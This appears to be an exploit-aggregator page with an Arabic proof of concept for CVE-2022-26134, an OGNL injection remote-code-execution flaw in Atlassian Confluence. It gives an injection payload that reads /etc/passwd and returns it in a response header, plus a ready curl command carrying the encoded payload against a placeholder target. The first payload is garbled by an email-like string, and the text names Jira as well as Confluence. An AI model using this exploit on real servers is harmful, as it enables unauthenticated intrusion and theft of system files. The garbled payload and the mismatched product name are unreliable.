Sploitus

Exploit for cve-2022-26134 CVE-2022-26134

kitploit · 2026-08-25

Exploit Code

MARKDOWN26 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IVERESK-CVE-2022-26134
# CVE-2022-26134 بواسطة 1vere$k

مجرد إثبات مفهوم (PoC) بسيط لاستغلال أطلاسيان جيرا. يوفر تنفيذ الأكواد لمستخدم غير مصرح له على الخادم.

**CVE-2022-26134 - ثغرة حقن OGNL.**

سكربت إثبات مفهوم يستغل ثغرة تنفيذ الأكواد عن بُعد التي تؤثر على أطلاسيان كونفلونس 7.18 والمنتجات الأقدم. تسمح ثغرة حقن OGNL لمستخدم غير مصادق بتنفيذ أكواد عشوائية على خادم كونفلونس أو مثيل مركز البيانات.

## الحمولة

root@kitploit:~
    
    
    ${(#some-email@example.com@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
    

**مثال مع أمر CURL:**

root@kitploit:~
    
    
    curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 
    

بعد ذلك، ستنعكس نتيجة الأمر في المعامل `X-Cmd-Response` في ترويسة الاستجابة.